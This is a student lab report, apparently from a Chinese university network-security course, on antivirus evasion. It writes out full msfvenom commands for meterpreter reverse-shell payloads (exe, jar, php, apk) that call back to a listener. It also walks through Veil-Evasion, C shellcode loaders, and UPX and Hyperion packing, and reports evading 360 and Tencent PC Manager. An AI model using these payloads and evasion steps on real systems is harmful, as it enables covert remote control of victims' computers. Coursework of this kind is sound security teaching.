2018-2019-2 20165330《网络对抗技术》Exp3 免杀原理与实践

目录


实验内容
---------- - [正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳工具,自己利用shellcode编程等免杀工具或技巧](#0) - [通过组合应用各种技术实现恶意代码免杀](#1) - [用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本](#2)

返回目录


基础问题
---------- - 杀软是如何检测出恶意代码的? >- 基于特征码:如果一个可执行文件(或其他运行的库、脚本等)包含有类似恶意代码的一段或多段数据则被杀软认为是恶意代码。 >- 启发式恶意软件检测:如果一个软件做一些恶意软件通常干的典型例子,就把它当成一个恶意软件。 >- 基于行为的恶意软件检测:在启发式基础上对软件行为进行监控
  • 免杀是做什么?

对恶意软件做一些处理,使它不被杀毒软件所检测出来

  • 免杀的基本方法有哪些?
  • 改变特征码
    • 只有EXE:加壳
    • 有shellcode:利用shellcode生成可执行文件
    • 有源代码:用其他语言进行重写再编译
  • 改变行为:改变通讯方式或操作模式
  • 利用现有playload手工打造一个后门程序

返回目录


相关知识
---------- - VirusTotal、Virscan - 集成了60多个商业杀毒软件的扫描引擎 - 可以上传免杀处理过的程序进行检测 - [https://www.virustotal.com/](https://www.virustotal.com/ )、 [http://www.virscan.org/](http://www.virscan.org/) - `msfvenom`直接生成`meterpreter`可执行文件,检出率为46/57;`Msfvenom`是Metasploit平台下用来编码`payloads`免杀的工具 - Veil-Evasion - 一个免杀平台,是用其他语言如`c,c#,phython,ruby,go,powershell`等重写了meterperter,然后再通过不同方式编译成`exe` - virustoal检出为19/57 - 半手工打造恶意软件:C语言调用`Shellcode` - 加壳 - 加壳的全称应该是可执行程序资源压缩,压缩后的程序可以直接运行 - 加壳的一种常用的方式是在二进制的程序中植入一段代码,在运行的时候优先取得程序的控制权,之后再把控制权交还给原始代码 - MSF的编码器使用类似方法,对shellcode进行再编码 - 技术上分壳分为:压缩壳、加密壳、虚拟机

返回目录


实验步骤
---------- #####
正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳工具,自己利用shellcode编程等免杀工具或技巧
>(一)正确使用msf编码器 >- 我们可以使用`msfvenom -l encoders`查看可以使用的编码器来生成不同的后门,更多的参数可以参考[msfvenom一些用法](http://blog.sina.com.cn/s/blog_d181a6820102waf9.html) >- 将实验二中用msf命令生成的后门程序放到[virscan网站](http://www.virscan.org/)中扫描结果如下 ![image](https://img2018.cnblogs.com/blog/1291750/201903/1291750-20190328205132379-2010666406.png) >可以知道后门程序如果不加处理,绝大多数杀软很快就可以识别出来。 >- 我们使用`msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.183.130 LPORT=5330 -f exe > met-encoded.exe`进行10次编码试试降低检出率 ![image](https://img2018.cnblogs.com/blog/1291750/201903/1291750-20190328205339203-202682096.png) >- 再在[virscan网站](http://www.virscan.org/)中扫描 ![image](https://img2018.cnblogs.com/blog/1291750/201903/1291750-20190328205224679-1340440817.png) >- 对比发现并没有实质变化,因为msfvenom会以固定的模板生成exe,所有它生成的exe,如果使用默认参数或模板,也有一定的固定特征。而AV厂商会针对其使用的模板来生成特征码,这样就一劳永逸地解决所有msfvenom生成的恶意代码了。

(二)msfvenom生成如jar之类的其他文件

  • 生成jar文件:msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.183.130 lport=5330 x> 20165330_backdoor_java.jar
    image
    • 扫描一下,检出率降低好多!
      image
  • 生成php文件:msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.183.130 lport=5330 x> 20165330_backdoor.php
    image
    • 扫描一下,这个效果更好
      image
  • 生成apk文件:msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.183.130 LPORT=5330 R > 20165330_backdoor.apk
    image
    • 扫描一下,效果没有之前的好
      image
  • 其他类型的文件可以参考msfvenom生成各类Payload命令

(三)veil-evasion

  • 安装步骤参考安装免杀工具Veil-Evasion,过程很慢(耐心ing)(在最后一步输入命令回车后不要动,最后选择默认选项一直等待安装完成)(因为我的安装完后无法生成输出文件,估计因为镜像版本的原因我用的18.1版本的,就拷贝了同学的虚拟机19.1版本的veil生成成功)
  • 结束后ls找到Veil-Evasion.py ,然后./Veil-Evasion.py进入veil
    image
    image
  • veil中输入use找到c/meterpreter/rev_tcp,输入6用c语言重写meterperter(如下图)
    image
  • 设置反弹连接IP:set LHOST 192.168.183.130(此处IP为Kali IP)
  • 设置端口:set LPORT 5330(也可以使用默认端口4444)
    image
  • 输入generate生成文件,然后输入playload的名字:20165330-playload,信息如下
    image
  • 然后我们进到目录/usr/share/veil-output/compiled里可以找到我们生成的文件
    image
  • 将其放在virscan网站中扫描,检出率有所降低
    image

(四)利用shellcode编程

  • 使用msf生成一段c语言格式的shellcode数组:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.183.130 LPORT=5330 -f c
    image
  • 将生成的shellcode写入到下面的C代码中进行调用,命名5330-shellcode.c
    image
  • 交叉编译(过程见问题二)使该文件可以在windows下运行:i686-w64-mingw32-g++ 5330-shellcode.c -o 5330-shellcode.exe
  • 测试shellcode可用性(关闭杀软)
    • 一开始我将生成的exe文件传到windows里用命令行运行,没有发生回连
    • 之后我改用windows下的vc重新编译运行,回连成功
      image
  • 将生成的5330-shellcode.exe上传至virscan网站中扫描仍会被扫描出来,开启杀软会被杀掉
    image

(五)加壳工具

  • 压缩壳:
    • 尝试对上面的shellcode加壳:upx 5330-shellcode.exe -o 5330-shellcode.upxed.exe
      image
    • 测试可用性
      image
    • 上传至virscan网站中扫描,概率大大降低,但依然被360查杀
      image
  • 加密壳:
    • 将生成upx文件拷贝到/usr/share/windows-binaries/hyperion/目录中
    • 进入目录/usr/share/windows-binaries/hyperion/
    • 输入wine hyperion.exe -v 5330-shellcode_upxed.exe 5330-shellcode_upxed_Hyperion.exe进行加壳
      image
    • 测试可用性
      image
    • 上传至virscan网站中扫描
      image
通过组合应用各种技术实现恶意代码免杀
  • 采用C语言调用shellcode+压缩壳方式免杀成功并可以回连
    • 被控主机:win10
    • 扫描软件:360安全卫士11.5.0.2001
    • 将shellcode在vc下编译,在进行加壳
      • 成功回连
        image
      • 免杀成功
        image
      • 此种有缺陷,360可以基于行为监测在运行时程序就会被发现T.T
  • 采用C语言调用bloxor编码的shellcode方式免杀成功并可以回连
    • 被控主机:win10
    • 扫描软件:360安全卫士11.5.0.2001
    • 生成shellcode:msfvenom -p windows/meterpreter/reverse_tcp -e x86/bloxor LHOST=192.168.183.130 LPORT=5330 -f c
    • 将加入shellcode的c程序在vc下编译
      • 成功回连
        image
      • 免杀成功
        image
      • 只是换了一种编码方式,多次扫描都没有被发现!!
用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本

杀软名称:腾讯电脑管家13.3.20237.212
电脑版本:win7 x64系统

  • 用舍友电脑互ping时发现ping不通,才知道IP地址需要在同一网段
  • 我将我的kali虚拟机和舍友电脑上的win7虚拟机的网络适配器均改为桥接模式,使IP地址网段相同,ping通。
  • 将我上面第二种方法所生成的程序拷贝到舍友电脑上,开始控制。
    • 免杀成功
      image
    • 回连成功
      image

返回目录


实验过程中遇到的问题
---------- - 在进行upx加壳时报错“upx: 5330-shellcode.exe: NotCompressibleException” ![image](https://img2018.cnblogs.com/blog/1291750/201903/1291750-20190328114008560-228369110.png) >解决办法:百度后参考[解决UPX NotCompressibleException](http://www.itkeyword.com/doc/0728723905169709x789/upx-notcompressibleexception)静态编译后成功加壳
  • 在测试shellcode可用性时,在windows下运行5330-shellcode.exe提示该版本的 E:\ncat\5330-shellcode.exe 与你运行的 Windows 版本不兼容

解决办法:

  • 在仔细检查前面的过程后,发现我一开始直接用了gcc来编译,这样产生的linux的可执行文件,在windows下是不能运行的。。此时需要用交叉编译来实现。
  • 参考linux与windows交叉编译sudo apt-get install mingw-w64下载编译软件,在编译程序i686-w64-mingw32-g++ 5330-shellcode.c -o 5330-shellcode.exe
  • 在kali 18.1版中安装veil成功,但运行无法输出文件

解决办法:我一开始是拷贝了kali 19.1版的kali运行成功,后参考孙晓暄同学的博客在18.1中成功

  • 在veil进行python语言重写时,生成文件失败,但用其他语言可以成功。。
    image
  • 我按照老师的方法,cd setup中找到setup.sh后,运行./setup.sh更新,结果报错安装依赖关系失败。。看好多同学也是无法输出,暂时还不知怎么解决。。

返回目录


离实战还缺些什么技术或步骤?
---------- - 现在我们所做的步骤都是传送到被控主机上,很明显的被发现,然后开始运行,虽然会躲过一些杀软,但是我们不能十足的保证不会被杀,在实战也还存在如何巧妙地伪装,如何安插在正常软件中躲过扫描,以及如何吸引让被控主机自主运行等技术。

返回目录


实验总结与体会
---------- - 本次实验的出错率真的有点多,过程做的十分艰难,从一开始的装veil就感觉我的虚拟机就像和我作对。。后来换了虚拟机后,按照老师的步骤,虽然还是在出错,但是解决后成功的那一瞬间真的感觉超级棒,从这次实验我也体会到我们在一步步深入到免杀原理中,亲手打造的程序虽然并不是很强大,但是对刚开始学习的我们真的有十足的兴趣去研究,另一方面还是告诉我们一定要增强防范意识,保护好自己的信息。
posted @ 2019-03-29 15:56  20165330张羽昕  阅读(467)  评论(0编辑  收藏  举报